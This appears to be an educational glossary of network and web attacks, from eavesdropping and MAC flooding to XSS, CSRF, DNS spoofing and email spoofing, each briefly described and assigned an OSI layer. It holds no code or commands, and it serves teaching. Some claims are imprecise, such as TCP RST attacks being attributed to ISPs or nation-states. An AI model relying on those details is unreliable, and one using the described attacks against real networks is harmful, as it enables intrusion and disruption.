Eavesdropping
An attacker intercepts and monitors data transmitted over a wired or wireless network. It works by using packet sniffers or network taps to capture packets in transit. The purpose is to steal credentials or other sensitive data. Hackers can also launch other cyberattacks such as session hijacking or man-in-the-middle (MITM). Eavesdropping attacks occur at the data link layer.
MAC Flooding
This attack is based on flooding a switch with a large number of fake MAC addresses to overflow the MAC address table. The switch then enters “fail open” mode, where it broadcasts packets to all ports. Sending numerous frames with different source MAC addresses to the switch causes network disruption and denial of service (DoS). MAC flooding attacks occur at the data link layer.
ARP Spoofing
An attacker advertises false ARP messages on the network that associates their MAC address with the IP address of another device. The hacker impersonates a legitimate device on the network to intercept or modify traffic. This interception enables launch of man-in-the-middle or DDoS attacks. ARP spoofing attacks occur at the data link layer.
MAC Spoofing
Hacker spoofs (impersonates) the MAC address that is assigned to a legitimate device on the network. The purpose is to impersonate another device and bypass MAC address-based security or gain unauthorized access. MAC spoofing occurs at the data link layer.
STP Manipulation
STP manipulation involves exploiting STP to alter the network topology, leading to network instability. An attacker could access a private network with credentials from an email phishing attack, and send forged BPDUs from a laptop. For example to elect a laptop as root bridge and launch MITM attack, since traffic is now routed through laptop. The purpose of MITM is to steal credentials or other sensitive information. The attacker could also launch MAC flooding attack causing a denial-of-service. STP manipulation attacks occurs at data link layer.
SSID Spoofing
The attacker creates a fake Wi-Fi network with the same SSID (Service Set Identifier) as a legitimate access point. The attacker configures a device to broadcast a fake SSID to deceive users into connecting to their network. The purpose is to deceive wireless clients into connecting to the attacker network and allowing for traffic interception. SSID spoofing attacks occur at the data link layer.
VLAN Hopping
Exploiting VLAN misconfiguration or switch spoofing to gain access to other VLANs. An attacker connects laptop to a switch and negotiates a dynamic trunk (DTP). Ethernet frames are tagged with a VLAN that allow traffic to hop from one VLAN to another across a switch trunk. This would permit unauthorized access to a particular VLAN and enable DDoS attack as well. VLAN hopping attacks occur at the data link layer.
IP Spoofing
An attacker sends IP packets with a false source IP address to disguise the true origin of the packet. The attacker manipulates the IP header of packets to change the source address. This IP address could already be assigned to a legitimate device, or assign a fake address that is permitted on a subnet. The purpose is to perform further cyberattacks such as DNS spoofing or launch DDoS attacks. IP spoofing occurs at the network layer.
Route Hijacking
Cyberattack that redirects network traffic to a malicious router by manipulating the routing table. The attacker injects incorrect routing information to modify traffic flow and intercept data. The purpose is to launch DDoS attacks, steal credentials, or other sensitive data. Route hijacking attacks occur at the network layer.
TCP ACK Flood
The attacker sends a large number of ACK packets to multiple target network devices such as routers or servers. The attacker sends forged ACK packets and distributes them with botnets to flood target. The purpose is to consume CPU and memory resources on a router for example and deny network services. TCP ACK flood attacks occur at the transport layer.
TCP SYN Flood
Common denial-of-service attack where an attacker sends numerous TCP SYN packets with fake source IP addresses. The server responds with SYN/ACK packets as part of a TCP handshake but never receives the ACK response. The server then holds multiple half-open connections in a filled queue that prevent legitimate connections. TCP SYN flood attacks occur at the transport layer.
TCP RST
TCP RST (Reset) attack is a type of denial-of-service (DoS) cyberattack initiated by an ISP or nation-state. Forged TCP reset (RST) packets are sent from a firewall for example with an appropriate sequence number to spoof TCP protocol. The purpose is to terminate incoming network connections and eventually cause denial-of-service. Connections from blacklisted domains are dropped and access to websites are denied to enforce censorship. TCP RST attacks occur at the transport layer.
HTTP Flood
Distributed denial-of-service (DDoS) attack that floods a target web server with HTTP requests. The attacker sends numerous HTTP requests to a server via botnets. The attack causes a web server to become unresponsive and make a website or server unavailable. HTTP flood attacks occur at the application layer.
ICMP Ping Flood
Attacker sends a flood of ICMP echo request (ping) packets to a target to overload it. The attacker sends many ping requests to a public server for example, that consume CPU and memory. The purpose is to cause denial-of-service as public server attempts to respond with echo-reply packets. ICMP ping flood attacks occur at the network layer.
UDP Flood
Attacker sends a high volume of UDP packets via botnets to random ports on the target machine. UDP flood causes the server to respond with ICMP destination unreachable messages. This is a distributed denial-of-service attack (DDoS) that consumes CPU and memory resources and makes the server unresponsive. Attackers identify vulnerable botnets such as IoT that can be leveraged to launch an attack. Botnet vulnerabilities include firmware bugs or HTTP that can be exploited. UDP flood attacks occur at the transport layer.
UDP Amplification
An attacker sends small, forged UDP requests to vulnerable public servers. These UDP packets are spoofed to appear as if they originate from the IP address of a legitimate target. The vulnerable servers then respond with much larger replies, which are sent to the spoofed IP address. This results in a flood of amplified traffic reflected toward the target server. The hacker leverages DNS internet servers for example, to amplify a distributed denial-of-service (DDoS) attack. UDP amplification attacks occur at the transport layer
DNS Flood
DNS server is flooded (overloaded) with DNS requests, leading to service disruption. The attacker sends a large number of DNS queries to the server that consume resources and causes denial-of-service. The purpose is to cause network outages since DNS is required for most network connections to servers. DNS flood attacks occur at the application layer.
Cross-Site Scripting (XSS)
Malicious script is inserted into a web page that is executed on a client browser when viewed. Input data from users that is returned from server is not properly sanitized. An attacker injects JavaScript for example to steal session cookies, redirect users, or perform other malicious activities. Cross-site scripting attacks occur at the application layer.
SQL Injection Attacks
Attacker inserts malicious SQL code into a query typically through input fields like web forms to manipulate a database. The attacker exploits insecure input validation to run arbitrary SQL queries on the backend database. The purpose is to gain unauthorized access to view, modify or delete data from a database. SQL injection attacks occur at the application layer.
CSRF (Cross-Site Request Forgery)
An attack that tricks an authenticated user to perform actions without their consent. This happens when a user clicks a malicious email phishing link or social media post. The attacker embeds code that triggers a request based on an authenticated session cookie. This enables attacker to access user banking, e-commerce, or social media website with a valid session cookie. Do not have email or other web pages open at the same time as your banking application. CSRF attacks occur at the application layer.
Session Hijacking
An attacker takes over a web application session by stealing a session ID or cookies. The attacker intercepts session information and uses it to impersonate the user. This is often accomplished with man-in-the-middle (MITM) or cross-site scripting attack. The purpose is to gain unauthorized network access to steal sensitive data or make bank transfers. Session hijacking attacks occur at the application layer.
SSL Stripping
Man-in-the-Middle (interception) attack that downgrades a secure HTTPS connection to an unencrypted HTTP connection. The attacker intercepts the communication to steal sensitive data transmitted over an insecure connection. Man-in-the-Middle attacks are often launched over a public wireless network. SSL stripping attacks occur at the application layer.
Session Replay
Replaying previously captured security credentials to gain unauthorized access. For example, server issues a session ID or JWT token to a user with login request. The attacker captures the session data (cookies, tokens etc.) and replays it to impersonate the legitimate user. This enables attacker to reuse valid session security data for malicious purposes. Session replay attacks occur at the application layer.
DNS Spoofing
DNS cache poisoning involves corrupting DNS cache of a legitimate DNS server, to redirect traffic to malicious websites. The attacker obtains access to the private network via email phishing for example to intercept DNS query from client. Attacker then generates an incorrect DNS record and sends this as a response to the DNS server. This occurs before the DNS query from client arrives at DNS server. The client receives a response from DNS server with a fake DNS record that redirects them to malicious website. DNS spoofing attacks occur at the application layer.
Email Spoofing
Faking the email address of sender to appear as though it is from a trusted source. The attacker alters the “From” field in the email header to impersonate a legitimate sender. This attack exploits SMTP protocol that does not verify sender identity by default. The purpose is to deceive users into opening malicious phishing emails or malware. Email spoofing attacks occur at the application layer.
Nmap Commands Cheat Sheet
